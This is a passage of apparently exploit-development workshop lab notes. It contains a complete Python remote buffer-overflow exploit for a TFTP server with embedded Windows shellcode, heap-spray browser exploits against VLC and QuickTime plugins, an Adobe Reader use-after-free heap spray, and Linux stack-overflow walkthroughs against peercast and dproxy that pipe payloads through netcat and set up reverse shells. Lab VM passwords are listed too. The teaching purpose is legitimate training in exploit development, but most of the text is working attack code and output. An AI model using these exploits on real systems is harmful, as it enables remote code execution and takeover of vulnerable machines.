  840. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  841. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  842. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  843. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  844. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  845.  
  846.  
  847. STACK SHIFTER:
  848. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  849. prepend += "\x44" # inc esp
  850.  
  851.  
  852.  
  853.  
  854.  
  855.  
  856.  
  857.  
  858.  
  859.  
  860.  
  861.  
  862.  
  863.  
  864. ---- final script ----
  865.  
  866. #!/usr/bin/python2
  867. #TFTP Server remote Buffer Overflow
  868.  
  869. import sys
  870. import socket
  871. import struct
  872.  
  873. if len(sys.argv) < 2:
  874. sys.stderr.write("Usage: tftpd.py <host>\n")
  875. sys.exit(1)
  876.  
  877. target = sys.argv[1]
  878. port = 69
  879.  
  880. eip = 0x7e429353 # jmp esp in USER32.DLL
  881.  
  882. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  883. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  884. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  885. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  886. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  887. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  888. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  889. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  890. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  891. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  892.  
  893. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  894. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  895. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  896. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  897. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  898. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  899. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  900. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  901. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  902. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  903. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  904.  
  905. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  906. prepend += "\x44" # inc esp
  907.  
  908. buf = "\x00\x01" # receive command
  909.  
  910. buf += "\x90" * (256 - len(part2)) # NOPs
  911. buf += part2 # shellcode part 2
  912. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  913. buf += prepend # stack shifter
  914. buf += part1 # shellcode part 1
  915. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  916. buf += "\x00" # END
  917.  
  918. # print buf
  919.  
  920. # buf = "\x00\x01" # receive command
  921.  
  922. # buf += "A" * 300 + "\x00"
  923.  
  924. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  925.  
  926. try:
  927. sock.connect((target, port))
  928. sock.sendall(buf)
  929. except Exception as e:
  930. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  931. finally:
  932. sock.close()
  933. sys.stderr.write("Sent.\n")
  934.  
  935.  
  936.  
  937. -----------------------------------------------------------------------------------------------------------------
  938.  
  939.  
  940.  
  941.  
  942. How does all of this actually work
  943.  
  944.  
  945.  
  946.  
  947. Total shellcode length: 315
  948.  
  949. Part1: 150
  950. Part2: 165
  951.  
  952.  
  953. NOPS * (256 - 165)
  954.  
  955. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  956. | | |
  957. 256 260 150 (410) |
  958. |<------------------------------------------------------------------------------------------------------------|
  959. Jump to the
  960. 30 byte mark
  961.  
  962.  
  963.  
  964. ############################
  965. # Lab 3: Browsers Exploits #
  966. ############################
  967.  
  968. ---------------------------Type This-----------------------------------
  969.  
  970. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
  971. -----------------------------------------------------------------------
  972.  
  973. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  974. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  975.  
  976. <object id=quicktime clsid="999-999999-99-99999">
  977. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  978. </object>
  979.  
  980. var buf = "";
  981. for(i = 0; i < 50000; i++)
  982. buf += "A";
  983. var myobject = document.getElementById("quicktime");
  984. myobject.url = buf;
  985.  
  986. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  987.  
  988. - Browsers (Flash)
  989. - PDF
  990. - MS Office / OOo
  991.  
  992. VLC smb:// exploit
  993. ------------------
  994.  
  995. EXPLOIT VECTOR
  996.  
  997. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  998.  
  999. Exploit Scripts
  1000. - ffvlc
  1001.  
  1002. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  1003.  
  1004. perl daemon.pl vlc0.html
  1005.  
  1006. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
  1007. Browse to http://your_host_ip_address:8080/
  1008.  
  1009. vlc0.html
  1010. ---------
  1011. <script>
  1012. var buf = "";
  1013. for(i = 0; i < 1250; i++)
  1014. buf += unescape("%41%41%41%41");
  1015. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1016. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1017. </script>
  1018.  
  1019. vlc1.html
  1020. ---------
  1021. <script>
  1022.  
  1023. // shellcode created in heap memory
  1024. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1025.  
  1026. // 800K block of NOPS
  1027. var nop = unescape("%u9090%u09090"); // 4 NOPS
  1028. while(nop.length < 0xc0000) {
  1029. nop += nop;
  1030. }
  1031.  
  1032. // spray the heap with NOP+shellcode
  1033. var memory = new Array();
  1034. for(i = 0; i < 50; i++) {
  1035. memory[i] = nop + shellcode;
  1036. }
  1037.  
  1038. // build the exploit payload
  1039. var buf = "";
  1040. for(i = 0; i < 1250; i++)
  1041. buf += unescape("%41%41%41%41");
  1042. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1043.  
  1044. // trigger the exploit
  1045. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1046. </script>
  1047.  
  1048. ---------------------------Type This-----------------------------------
  1049.  
  1050. perl daemon.pl vlc1.html
  1051. -----------------------------------------------------------------------
  1052.  
  1053. Search for where our NOPS+shellcode lies in the heap
  1054.  
  1055. s 0 l fffffff 90 90 90 90 cc cc cc cc
  1056.  
  1057. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  1058. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1059. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1060. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1061. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1062. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1063. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1064. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1065. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1066. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1067. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1068. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1069. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1070. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1071. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1072. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1073. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1074.  
  1075. Edit vlc2.html
  1076. replace %41%41%41%41 with %07%07%07%07
  1077.  
  1078. (928.fd0): Break instruction exception - code 80000003 (first chance)
  1079. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  1080. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  1081. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1082. 07100000 cc int 3
  1083. 0:019> u
  1084. 07100000 cc int 3
  1085. 07100001 cc int 3
  1086. 07100002 cc int 3
  1087. 07100003 cc int 3
  1088. 07100004 cc int 3
  1089. 07100005 cc int 3
  1090. 07100006 cc int 3
  1091. 07100007 cc int 3
  1092.  
  1093. Create vlc3.html (Copy vlc2.html to vlc3.html)
  1094. ----------------------------------------------
  1095. Win32 Reverse Shell
  1096. - no restricted characters
  1097. - Encoder NONE
  1098. - use the Javascript encoded payload generated by msfweb
  1099.  
  1100.  
  1101.  
  1102.  
  1103. #######################
  1104. # Lab 4: PDF EXPLOITS #
  1105. #######################
  1106.  
  1107. ---------------------------Type This-----------------------------------
  1108.  
  1109. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
  1110. -----------------------------------------------------------------------
  1111.  
  1112. Acrobat Media newPlayer exploit
  1113. -------------------------------
  1114.  
  1115. Use-after-free bug
  1116.  
  1117. Exploit scripts are online at 172.16.0.100
  1118. - adobe_mnp
  1119.  
  1120. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  1121.  
  1122.  
  1123. mnp0.pdf
  1124.  
  1125. - Open up acrobat reader
  1126. - WinDBG
  1127. - F6 attach to AcroRd32.exe
  1128. - g to Go
  1129.  
  1130. EIP = 41414141
  1131.  
  1132. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  1133.  
  1134. mnp1.pdf
  1135.  
  1136. All we are doing is changing EIP to 0c0c0c0c.
  1137. There is no heap spray in this one.
  1138.  
  1139. This exception may be expected and handled.
  1140. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  1141. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  1142. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  1143. 0c0c0c0c ?? ???
  1144.  
  1145. We know we get EIP control
  1146.  
  1147. mnp2.pdf
  1148.  
  1149. Put in the heap spray.
  1150.  
  1151. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1152.  
  1153. var nops = unescape("%u9090%u9090");
  1154.  
  1155. while(nops.length <= 32768)
  1156. nops += nops;
  1157. nops = nops.substring(0,32768 - shellcode.length);
  1158.  
  1159. memory = new Array();
  1160.  
  1161. for(i = 0; i < 1500; i++) {
  1162. memory[i] = nops + shellcode;
  1163. }
  1164.  
  1165. 1500 NOP+shellcode blocks of 32K NOPs each
  1166.  
  1167. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  1168.  
  1169. We want to see what led to the crash.
  1170.  
  1171. EIP is invalid, so we can't disassemble around EIP
  1172.  
  1173. We need to trace the function that called us and crashed.
  1174. - STACK TRACE
  1175. - Dumps all the frames from the top of the stack.
  1176. - show you the series of calls that led up to the crash.
  1177. - we will analyze the topmost function on the frame.
  1178.  
  1179. WinDBG - stack trace - "k" command
  1180.  
  1181. 0:000> k
  1182. ChildEBP RetAddr
  1183. WARNING: Frame IP not in any known module. Following frames may be wrong.
  1184. 0013fb34 2d843117 0x90909090
  1185. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  1186. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  1187. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  1188. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  1189. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  1190. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  1191. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  1192. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  1193. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  1194. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  1195. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  1196. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  1197. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  1198. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  1199. 0013ffc0 7c817067 AcroRd32+0x4004
  1200. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  1201.  
  1202. 2d843117 -- the return address that we would have returned to, if we didnt crash.
  1203. address 2d843117-2 we will have a CALL instruction.
  1204.  
  1205. u 2d843117
  1206. u 2d843117-2
  1207. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  1208. u 2d843117-4
  1209.  
  1210. 0:000> u 2d843117-3
  1211. Multimedia!PlugInMain+0x41b66:
  1212. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  1213. 2d843117 6a00 push 0
  1214. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  1215. 2d84311e 56 push esi
  1216. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  1217. 2d843124 83c40c add esp,0Ch
  1218. 2d843127 66b80100 mov ax,1
  1219. 2d84312b 5e pop esi
  1220.  
  1221. We control EDX
  1222. edx=0c0c0c0c
  1223.  
  1224. call [edx+4] = call [0c0c0c10]
  1225. dd edx+4
  1226.  
  1227. 0:000> dd edx+4
  1228. 0c0c0c10 90909090 90909090 90909090 90909090
  1229. 0c0c0c20 90909090 90909090 90909090 90909090
  1230.  
  1231. 0:000> u 2d843117-7
  1232. Multimedia!PlugInMain+0x41b62:
  1233. 2d843110 8b10 mov edx,dword ptr [eax]
  1234. 2d843112 8bc8 mov ecx,eax
  1235. 2d843114 ff5204 call dword ptr [edx+4]
  1236.  
  1237. dd eax
  1238.  
  1239. 0:000> dd eax
  1240. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  1241. 02e2d690 42424242 42424242 42424242 42424242
  1242. 02e2d6a0 42424242 42424242 42424242 42424242
  1243. 02e2d6b0 42424242 42424242 42424242 42424242
  1244. 02e2d6c0 42424242 42424242 00000000 00000000
  1245.  
  1246. mnp3.pdf
  1247.  
  1248. change the NOPs 90909090 to 0c0c0c0c
  1249.  
  1250. mov edx, [eax]
  1251. call [edx+4]
  1252.  
  1253. edx = 0c0c0c0c
  1254. edx+4 = 0c0c0c10
  1255. contents at edx+4 will also be "0c0c0c0c"
  1256.  
  1257. EIP will jump to 0c0c0c0c
  1258.  
  1259. and...
  1260.  
  1261. 0:000> u 0c0c0c0c
  1262. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  1263. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  1264. 0c0c0c0c 0c0c or al,0Ch
  1265. 0c0c0c0e 0c0c or al,0Ch
  1266. 0c0c0c10 0c0c or al,0Ch
  1267. 0c0c0c12 0c0c or al,0Ch
  1268. 0c0c0c14 0c0c or al,0Ch
  1269.  
  1270.  
  1271. ----------------------------------------------------------------------------------------------------------------
  1272.  
  1273. ##################
  1274. # Linux Exploits #
  1275. ##################
  1276.  
  1277. The target virtual machine for these labs can be downloaded from here:
  1278. https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
  1279. root: exploitlab
  1280. user: exploitlab
  1281. pass: exploitlab
  1282.  
  1283.  
  1284.  
  1285. The attack scripts can be downloaded from here:
  1286. https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
  1287. https://s3.amazonaws.com/secureninja/files/dproxy.zip
  1288. https://s3.amazonaws.com/secureninja/files/asterisk.zip
  1289.  
  1290.  
  1291. ######################################
  1292. # Lab 1: Simple Linux Stack Overflow #
  1293. ######################################
  1294. Login to the asterisk VM with the username/password of (exploitlab/exploitlab)
  1295.  
  1296. ---------------------------Type This-----------------------------------
  1297.  
  1298. cat victim1.c
  1299. gcc victim1.c -o victim1
  1300. ./victim AAAAAAAAAAAAAAAAAAA
  1301. ./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  1302.  
  1303.  
  1304.  
  1305. gdb -core core.xxxx
  1306. info registers
  1307. x/64x $esp
  1308. quit
  1309.  
  1310.  
  1311. /usr/local/sbin/peercast
  1312.  
  1313. -open peercast1.py on the XP attack-
  1314. python peercast1.py | nc asterisk-vm-ip 7144
  1315.  
  1316. gdb -core core.xxxx
  1317. info registers
  1318. x/64x $esp
  1319. quit
  1320.  
  1321.  
  1322.  
  1323. /usr/local/sbin/peercast
  1324.  
  1325. -open peercast2.py-
  1326. python peercast2.py | nc asterisk-vm-ip 7144
  1327.  
  1328. gdb -core core.xxxx
  1329. info registers
  1330. x/64x $esp
  1331. quit
  1332.  
  1333.  
  1334.  
  1335.  
  1336.  
  1337. - SSH into the Ubuntu Host (strategicsec:strategicsec) -
  1338. cd /home/strategicsec/toolz/metasploit/tools/exploit
  1339.  
  1340. Now we will run the pattern offset with ruby:
  1341.  
  1342. ruby pattern_offset.rb 42306142
  1343.  
  1344. and
  1345.  
  1346. ruby pattern_offset.rb 61423161
  1347. -----------------------------------------------------------------------
  1348.  
  1349. Distance to EIP is 780
  1350. Relative position of ESP 784
  1351.  
  1352. Now to find a good JMP ESP address with msfelfscan
  1353.  
  1354. ---------------------------Type This-----------------------------------
  1355.  
  1356. cd /home/strategicsec/toolz/metasploit/
  1357. ./msfelfscan -j ESP binaries/peercast_binary
  1358. -----------------------------------------------------------------------
  1359.  
  1360. 0x0808fb57 jmp esp <----- we will use this one!
  1361. 0x0808fcc7 jmp esp
  1362. 0x0808ffff jmp esp
  1363. 0x08090057 jmp esp <----- we can't use this one.
  1364. 0x080901df jmp esp
  1365.  
  1366.  
  1367. Now open and edit peercast3.py in notepad++ on our XP Host machine.
  1368. pad_lenth = the distance to EIP
  1369. ret_address = the jmp esp we are using
  1370.  
  1371. ---------------------------Type This-----------------------------------
  1372.  
  1373. python peercast3.py | nc asterisk-vm-ip 7144
  1374.  
  1375. gdb -core core.xxxx
  1376. info registers
  1377. x/64x $eip
  1378. x/10i $eip
  1379. quit
  1380. -----------------------------------------------------------------------
  1381.  
  1382. Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode
  1383.  
  1384. Linux IA32 Reverse Shell
  1385. LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
  1386. LPORT (Listening Port) – chose a port to run your listener on
  1387. Encoder: Alpha2
  1388.  
  1389. ---------------------------Type This-----------------------------------
  1390.  
  1391. nc -l -p 4321
  1392. python peercast4.py | nc asterisk-vm-ip 7144
  1393. -----------------------------------------------------------------------
  1394.  
  1395. ##################################################################
  1396. # Lab 2: Dealing with a lack of space for your shellcode problem #
  1397. ##################################################################
  1398.  
  1399. DPROXY EXPLOIT - DNS PROXY
  1400. --------------------------
  1401.  
  1402. SSH Login into your Asterisk VM as root
  1403. root / asterisk
  1404.  
  1405. Start dproxy
  1406. /usr/local/sbin/dproxy
  1407.  
  1408.  
  1409. DNS running on UDP port 53
  1410. we will use netcat's UDP mode (-u) for the transport.
  1411.  
  1412. ---------------------------Type This-----------------------------------
  1413.  
  1414. python dproxy1.py | nc -u asterisk-vm-ip 53
  1415.  
  1416. GDB COMMANDS
  1417.  
  1418. gdb -core core.9999 -- load core files
  1419. info registers -- inspect registers
  1420. x/64x $reg -- examine memory at a particular register
  1421. x/64x $esp -- examine memory at ESP
  1422. q -- quit
  1423. x/10i $eip -- disassemble 10 instructions beginning at EIP
  1424.  
  1425. python dproxy1.py | nc -u 192.168.128.140 53
  1426.  
  1427. gdb -core core.8888
  1428.  
  1429. (gdb) info registers
  1430. -----------------------------------------------------------------------
  1431.  
  1432. eax 0xbf9c8c40 0xbf9c8c40
  1433. ecx 0x184f 0x184f
  1434. edx 0xbf9c7da8 0xbf9c7da8
  1435. ebx 0x41414141 0x41414141
  1436. esp 0xbf9c7c00 0xbf9c7c00
  1437. ebp 0x41414141 0x41414141
  1438. esi 0x41414141 0x41414141
  1439. edi 0xbf9c8c40 0xbf9c8c40
  1440. eip 0x41414141 0x41414141
  1441.  
  1442. ---------------------------Type This-----------------------------------
  1443. (gdb) x/64x $esp
  1444. -----------------------------------------------------------------------
  1445.  
  1446. 0xbf9c7c00: 0x41414141 0x41414141 0x41414141 0x41414141
  1447. 0xbf9c7c10: 0x41414141 0x41414141 0x41414141 0x41414141
  1448. 0xbf9c7c20: 0x41414141 0x41414141 0x41414141 0x2e414141
  1449. 0xbf9c7c30: 0x41414141 0x41414141 0x41414141 0x41414141
  1450. 0xbf9c7c40: 0x41414141 0x41414141 0x41414141 0x41414141
  1451. 0xbf9c7c50: 0x41414141 0x41414141 0x41414141 0x41414141
  1452. 0xbf9c7c60: 0x41414141 0x41414141 0x41414141 0x41414141
  1453. 0xbf9c7c70: 0x41412e41 0x41414141 0x41414141 0x41414141
  1454. 0xbf9c7c80: 0x41414141 0x41414141 0x41414141 0x41414141
  1455. 0xbf9c7c90: 0x41414141 0x41414141 0x41414141 0x41414141
  1456. 0xbf9c7ca0: 0x41414141 0x41414141 0x41414141 0x41414141
  1457. 0xbf9c7cb0: 0x2e414141 0x41414141 0x41414141 0x41414141
  1458. 0xbf9c7cc0: 0x41414141 0x41414141 0x41414141 0x41414141
  1459. 0xbf9c7cd0: 0x41414141 0x41414141 0x41414141 0x41414141
  1460. 0xbf9c7ce0: 0x41414141 0x41414141 0x41414141 0x41414141
  1461. 0xbf9c7cf0: 0x41414141 0x41412e41 0x41414141 0x41414141
  1462.  
  1463. PATTERN
  1464.  
  1465. ---------------------------Type This-----------------------------------
  1466.  
  1467. python dproxy2.py | nc -u 192.168.128.140 53
  1468.  
  1469. (gdb) info registers
  1470. -----------------------------------------------------------------------
  1471.  
  1472. eax 0xbf9c8c40 0xbf9c8c40
  1473. ecx 0x184f 0x184f
  1474. edx 0xbf9c7da8 0xbf9c7da8
  1475. ebx 0x43377143 0x43377143
  1476. esp 0xbf9c7c00 0xbf9c7c00
  1477. ebp 0x30724339 0x30724339
  1478. esi 0x71433871 0x71433871
  1479. edi 0xbf9c8c40 0xbf9c8c40
  1480. eip 0x432e7243 0x432e7243 <------ messed up EIP
  1481.  
  1482. ---------------------------Type This-----------------------------------
  1483.  
  1484. (gdb) x/64x $esp
  1485. -----------------------------------------------------------------------
  1486.  
  1487. 0xbf9c7c00: 0x72433272 0x34724333 0x43357243 0x72433672
  1488. 0xbf9c7c10: 0x38724337 0x43397243 0x73433073 0x32734331
  1489. 0xbf9c7c20: 0x43337343 0x73433473 0x36734335 0x43377343
  1490. 0xbf9c7c30: 0x7343382e 0x30744339 0x43317443 0x74433274
  1491. 0xbf9c7c40: 0x34744333 0x43357443 0x74433674 0x38744337
  1492. 0xbf9c7c50: 0x43397443 0x75433075 0x32754331 0x43337543
  1493. 0xbf9c7c60: 0x75433475 0x36754335 0x43377543 0x75433875
  1494. 0xbf9c7c70: 0x30764339 0x43317643 0x76433276 0x34764333
  1495. 0xbf9c7c80: 0x43357643 0x76433676 0x38764337 0x43397643
  1496. 0xbf9c7c90: 0x77433077 0x32774331 0x43337743 0x77433477
  1497. 0xbf9c7ca0: 0x36774335 0x4337772e 0x77433877 0x30784339
  1498. 0xbf9c7cb0: 0x43317843 0x78433278 0x34784333 0x43357843
  1499. 0xbf9c7cc0: 0x78433678 0x38784337 0x43397843 0x79433079
  1500. 0xbf9c7cd0: 0x32794331 0x43337943 0x79433479 0x36794335
  1501. 0xbf9c7ce0: 0x43377943 0x79433879 0x307a432e 0x43317a43
  1502. 0xbf9c7cf0: 0x7a43327a 0x347a4333 0x43357a43 0x7a43367a
  1503.  
  1504. Relative position of ESP
  1505. [ESP] = 0x72433272 - 2077 bytes
  1506.  
  1507. We assume EIP is overwritten at 2073 bytes
  1508.  
  1509. dproxy3.py
  1510. - confirm that we get EIP = 42424242
  1511. - check the stack memory x/64x $esp
  1512.  
  1513. ---------------------------Type This-----------------------------------
  1514.  
  1515. (gdb) info registers
  1516. -----------------------------------------------------------------------
  1517.  
  1518. eax 0xbf9c8c40 0xbf9c8c40
  1519. ecx 0x184f 0x184f
  1520. edx 0xbf9c7df5 0xbf9c7df5
  1521. ebx 0x41414141 0x41414141
  1522. esp 0xbf9c7c00 0xbf9c7c00
  1523. ebp 0x41414141 0x41414141
  1524. esi 0x41414141 0x41414141
  1525. edi 0xbf9c8c40 0xbf9c8c40
  1526. eip 0x42424242 0x42424242
  1527.  
  1528. ---------------------------Type This-----------------------------------
  1529.  
  1530. (gdb) x/64x $esp
  1531. -----------------------------------------------------------------------
  1532.  
  1533. 0xbf9c7c00: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1534. 0xbf9c7c10: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1535. 0xbf9c7c20: 0xcccccccc 0xcccccccc 0xcccccccc 0x2ecccccc
  1536. 0xbf9c7c30: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1537. 0xbf9c7c40: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1538. 0xbf9c7c50: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1539. 0xbf9c7c60: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1540. 0xbf9c7c70: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1541. 0xbf9c7c80: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1542.  
  1543. NEXT STEP - GET INT3
  1544.  
  1545. ---------------------------Type This-----------------------------------
  1546.  
  1547. msfelfscan -j esp dproxy_binary
  1548. -----------------------------------------------------------------------
  1549.  
  1550. 0x0804a7ca push esp
  1551.  
